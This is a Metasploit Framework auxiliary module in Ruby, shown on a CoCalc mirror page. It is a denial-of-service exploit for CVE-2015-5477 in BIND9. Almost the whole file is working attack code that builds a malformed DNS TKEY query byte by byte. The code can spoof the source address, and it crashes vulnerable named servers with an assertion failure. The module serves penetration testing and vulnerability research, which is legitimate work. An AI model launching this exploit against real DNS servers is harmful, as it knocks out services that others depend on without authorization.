Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/dns/bind_tkey.rb
19813 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Capture

8
  include Msf::Auxiliary::UDPScanner

9
  include Msf::Auxiliary::Dos

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'BIND TKEY Query Denial of Service',

16
        'Description' => %q{

17
          This module sends a malformed TKEY query, which exploits an

18
          error in handling TKEY queries on affected BIND9 'named' DNS servers.

19
          As a result, a vulnerable named server will exit with a REQUIRE

20
          assertion failure. This condition can be exploited in versions of BIND

21
          between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0

22
          through 9.10.2-P2.

23
        },

24
        'Author' => [

25
          'Jonathan Foote',      # Original discoverer

26
          'throwawayokejxqbbif', # PoC

27
          'wvu'                  # Metasploit module

28
        ],

29
        'References' => [

30
          ['CVE', '2015-5477'],

31
          ['URL', 'http://web.archive.org/web/20190425014550/https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],

32
          ['URL', 'https://kb.isc.org/article/AA-01272']

33
        ],

34
        'DisclosureDate' => '2015-07-28',

35
        'License' => MSF_LICENSE,

36
        'DefaultOptions' => { 'ScannerRecvWindow' => 0 },

37
        'Notes' => {

38
          'Stability' => [CRASH_SERVICE_DOWN],

39
          'SideEffects' => [],

40
          'Reliability' => []

41
        }

42
      )

43
    )

44


45
    register_options([

46
      Opt::RPORT(53),

47
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])

48
    ])

49


50
    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')

51
  end

52


53
  def scan_host(ip)

54
    if datastore['SRC_ADDR']

55
      scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])

56
    else

57
      print_status("Sending packet to #{ip}")

58
      scanner_send(payload, ip, rport)

59
    end

60
  end

61


62
  def payload

63
    name = Rex::Text.rand_text_alphanumeric(1..42)

64
    txt = Rex::Text.rand_text_alphanumeric(1..42)

65


66
    name_length = [name.length].pack('C')

67
    txt_length = [txt.length].pack('C')

68
    data_length = [txt.length + 1].pack('n')

69
    ttl = [rand(2**31 - 1) + 1].pack('N')

70


71
    query = "\x00\x00" # Transaction ID: 0x0000

72
    query << "\x00\x00"  # Flags: 0x0000 Standard query

73
    query << "\x00\x01"  # Questions: 1

74
    query << "\x00\x00"  # Answer RRs: 0

75
    query << "\x00\x00"  # Authority RRs: 0

76
    query << "\x00\x01"  # Additional RRs: 1

77


78
    query << name_length # [Name Length]

79
    query << name        # Name

80
    query << "\x00"      # [End of name]

81
    query << "\x00\xf9"  # Type: TKEY (Transaction Key) (249)

82
    query << "\x00\x01"  # Class: IN (0x0001)

83


84
    query << name_length # [Name Length]

85
    query << name        # Name

86
    query << "\x00"      # [End of name]

87
    query << "\x00\x10"  # Type: TXT (Text strings) (16)

88
    query << "\x00\x01"  # Class: IN (0x0001)

89
    query << ttl         # Time to live

90
    query << data_length # Data length

91
    query << txt_length  # TXT Length

92
    query << txt         # TXT

93
  end

94
end

95


96